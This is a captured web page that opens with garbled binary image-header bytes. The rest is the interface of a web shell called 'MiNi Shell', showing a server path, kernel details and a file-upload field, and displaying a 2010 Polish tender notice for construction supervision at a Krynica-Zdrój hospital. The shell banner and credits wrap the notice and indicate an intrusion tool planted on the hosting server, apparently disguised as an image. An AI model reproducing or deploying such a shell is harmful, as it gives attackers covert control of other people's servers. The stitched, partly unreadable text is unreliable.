JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100608/146417-N-2010.html

<p class="kh_header"><b>Krynica: Przetarg nieograniczony na usługę pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacja robót budowlanych w zakresie zadania pod nazwą: Poprawa jakości leczenia poprzez rozbudowę i modernizację Szpitala im. dr J. Dietla w Krynicy-Zdroju w ramach: Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.3 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego, Schemat A Ochrona Zdrowia, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w 60% dla SP ZOZ Szpitala im. dr J. Dietla w</b><br>
<b>Numer ogłoszenia: 146417 - 2010; data zamieszczenia: 08.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej - Szpital im. dr J. Dietla w Krynicy Zdroju , ul. Kraszewskiego 142, 33-380 Krynica, woj. małopolskie, tel. 018 4712807, 4715196, faks 018 4712338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-krynica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługę pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacja robót budowlanych w zakresie zadania pod nazwą: Poprawa jakości leczenia poprzez rozbudowę i modernizację Szpitala im. dr J. Dietla w Krynicy-Zdroju w ramach: Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.3 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego, Schemat A Ochrona Zdrowia, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w 60% dla SP ZOZ Szpitala im. dr J. Dietla w.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu funkcji Inspektora Nadzoru na budowie dla inwestycji pod nazwą: Poprawa jakości leczenia poprzez rozbudowę i modernizację Szpitala im. dr J. Dietla w Krynicy-Zdroju określonej we Wspólnym Słowniku Zamówień (CPV) jako 71.52.00.00-9 (usługi nadzoru budowlanego). Wykonawca pełnić będzie obowiązki i funkcję Inspektora Nadzoru Inwestorskiego zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r., Nr 156, poz. 1118 z późn.zm.) oraz reprezentować będzie Inwestora w ramach realizacji projektu, którego postępowanie dotyczy.
2. Wykonawcy przed złożeniem oferty powinni zapoznać się z dokumentacją projektową dostępną w SPZOZ Szpitalu im. dr J. Dietla w Krynicy-Zdroju, ul. Kraszewskiego 142, pokój 120 w godz. od 9:00 do 14:00 oraz na stronie internetowej Zamawiającego www.szpital-krynica.pl.
3. Zamawiający informuje, że rozpoczęcie inwestycji prowadzonej pod nazwą: Poprawa jakości leczenia poprzez rozbudowę i modernizację Szpitala im. dr J. Dietla w Krynicy-Zdroju planuje się na miesiąc czerwiec 2010 roku, natomiast zakończenie planuje się na koniec grudnia 2010 roku.
4. Ponadto Zamawiający informuje, że miejscem wykonywania usługi będącej przedmiotem niniejszego postępowania przetargowego jest teren Szpitala im. dr J. Dietla w Krynicy-Zdroju, ul. Kraszewskiego 142, 33-380 Krynica-Zdrój.
5. Zamawiający informuje, że wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę:
a) pełnienie nadzoru inwestorskiego w branży budowlanej - przerób 3 152 974,81 zł netto
b) pełnienie nadzoru inwestorskiego w branży sanitarnej - przerób 2 310 625,05 zł netto
c) pełnienie nadzoru inwestorskiego w branży elektrycznej - przerób 1 992 813,81 zł netto
d) pełnienie nadzoru inwestorskiego w branży drogowej - przerób 338 811,09 zł netto
e) przerób razem - 7 795 224,76 zł netto
6. Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonej inwestycji w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego (wszystkich branż) nad realizacją robót budowlanych. Zakres zadań Inspektora nadzoru inwestorskiego  obejmuje czynności, o których mowa w niniejszej specyfikacji oraz w umowie z Wykonawcą.
7. W szczególności Inspektor Nadzoru jest zobowiązany do:
1) kontroli dokumentacji budowy Wykonawców
2) czuwania nad realizacją harmonogramu prac budowlanych
3) nadzoru nad prawidłowym przygotowaniem i złożeniem wniosków o zmianę pozwolenia na budowę
4) uczestnictwo przy przekazaniu głównemu Wykonawcy protokolarnie terenu budowy
5) zapewnienie nadzoru inwestorskiego na budowie
6) koordynacji robót budowlanych
7) uczestniczenia w rozruchu technologicznym wbudowanych maszyn i urządzeń
8) dokonywania odbiorów w terminach określonych w umowie z Wykonawcami, a także umożliwienia przedstawicielom Zamawiającego udziału w komisjach odbiorowych
9) nadzoru nad prawidłowym przygotowaniem i przekazaniem zawiadomienia o zakończeniu budowy i uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie
10)  sprawdzania prawidłowości dokumentów przedkładanych przez Wykonawców w celu uruchomienia płatności określonych w umowie z Wykonawcami
11) czuwania nad realizacją pozostałych obowiązków Wykonawców i uprawnień Zamawiającego wynikających z umów z Wykonawcami
12) wykonywania czynności określonych w umowie w sposób gwarantujący zachowanie terminów określonych w umowach z Wykonawcami
13) wykonywanie innych czynności przewidzianych w ustawie Prawo budowlane dla Zamawiającego na podstawie stosownego upoważnienia wydanego do danej czynności
14) kontrola terminowości wykonywania robót, ich ilości, jakości i wartości oraz prawidłowości fakturowania zgodnie z umowami zawartymi z Wykonawcami robót
15) obecność na budowie co najmniej 1 raz dziennie dokumentowania swoich wizyt wpisem do dziennika budowy, z podaniem zakresu robót, które zostały przez niego sprawdzone oraz na każde żądanie Zamawiającego
16) sprawdzanie kosztorysów na roboty podstawowe i dodatkowe nieprzewidziane, konieczne i zamienne oraz kontrola prawidłowości ich fakturowania
17) koordynowanie prac inspektorów branżowych
18) sprawdzenie dokumentacji niezbędnej dla uzyskania pozwolenia na użytkowanie
19) wyznaczania terminów prób w porozumieniu z Wykonawcami robót budowlanych, uczestnictwa i nadzoru nad próbami
20) wystawiania Wykonawcom robót budowlanych świadectwa, potwierdzającego pozytywny wynik prób
21) stałe konsultowanie i fachowe doradztwo na rzecz Inwestora
22) współpraca z Inwestorem, nadzorem autorskim i Wykonawcami w zakresie realizowanych robót budowlanych
23) wykonanie czynności wynikających z udzielonej przez Wykonawców gwarancji i rękojmi na roboty budowlane, łącznie z uczestnictwem w komisjach powołanych przez inwestora do oceny jakości robót w okresie gwarancji i rękojmi
24) sporządzenie wniosków o zapłatę kar umownych za zwłokę w usunięciu wad stwierdzonych w okresie gwarancji i rękojmi
25) sporządzenie protokołu pousterkowego
8. Szczegółowy zakres usługi określa wzór umowy - zał. nr 3.
9. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
10. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
11. Zamawiający nie przewiduje zawarcia umowy ramowej.
12. Zamawiający nie przewiduje rozliczenia w walutach obcych.
13. Zamawiający nie przewiduje aukcji elektronicznej.
14. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
15. Zamawiający dopuszcza możliwość powierzenia podwykonawcom wszystkich
części zamówienia. W przypadku kiedy Wykonawca powierzy wykonanie którejkolwiek
z części zamówienia podwykonawcom, zobowiązany jest do wskazania w ofercie
części której to dotyczy.	
16.		Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.
18.	TERMIN REALIZACJI ZAMÓWIENIA 
1. Miejscem realizacji zamówienia jest siedziba SPZOZ Szpitala im. dr J. Dietla przy ul. Kraszewskiego 142 w Krynicy-Zdroju.
2. Realizacja zamówienia obejmuje cały okres realizacji inwestycji: od dnia podpisania umowy do momentu dostarczenia kompletnej dokumentacji dla uzyskania pozwolenia na użytkowanie i końcowego rozliczenia inwestycji, po odbiorze końcowym.
3. Planowanym terminem odbioru końcowego inwestycji jest 30 grudzień 2010 r. 
4. Zamawiający zastrzega możliwość przesunięcia terminu realizacji umowy w przypadku przesunięcia terminu wykonania umowy na realizację robót budowlanych.
5. Termin płatności: 30 dni od dnia otrzymania faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie  Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie  Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie  Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, żeby  Wykonawca  dysponował personelem, posiadającym odpowiednie  uprawnienia budowlane w specjalności:
- konstrukcyjno-budowlanej bez ograniczeń - minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym jako inspektor nadzoru inwestorskiego - Osoba ta  będzie pełnić funkcję Koordynatora Inspektorów Nadzoru Inwestorskiego,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych- minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym 
- drogowej - minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym 
- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w dokumencie potwierdzającym spełnienie tego warunku tj. w wykazie osób o którym mowa w punkcie III.4.1) ppkt1)  specyfikacji wykaże, że dysponuje ww. wymienionym personelem - o odpowiednich kwalifikacjach, posiadającym niezbędne doświadczenie i wykształcenie oraz przedstawi oświadczenie, o którym mowa w pkt III.4.1) ppkt2),  że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie  Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany umowy w zakresie terminu wykonania. Zamawiający zastrzega możliwość przesunięcia terminu realizacji umowy w przypadku przesunięcia terminu wykonania umowy na realizację robót budowlanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-krynica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ Szpital im. dr J. Dietla w Krynicy-Zdroju, ul. Kraszewskiego 142, 33-380 Krynica-Zdrój, budynek administracji, pokój 109.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 09:00, miejsce: SPZOZ Szpital im. dr J. Dietla w Krynicy-Zdroju, ul. Kraszewskiego 142, 33-380 Krynica-Zdrój, budynek administracji, pokój 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską Funduszu Rozwoju Regionalnego w ramach: Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Oś Priorytetowa 6. Spójność wewnątrzregionalna, Działanie 6.3 Poprawa bezpieczeństwa mieszkańców, w tym socjalnego i zdrowotnego, Schemat A Ochrona Zdrowia, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w 60%.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com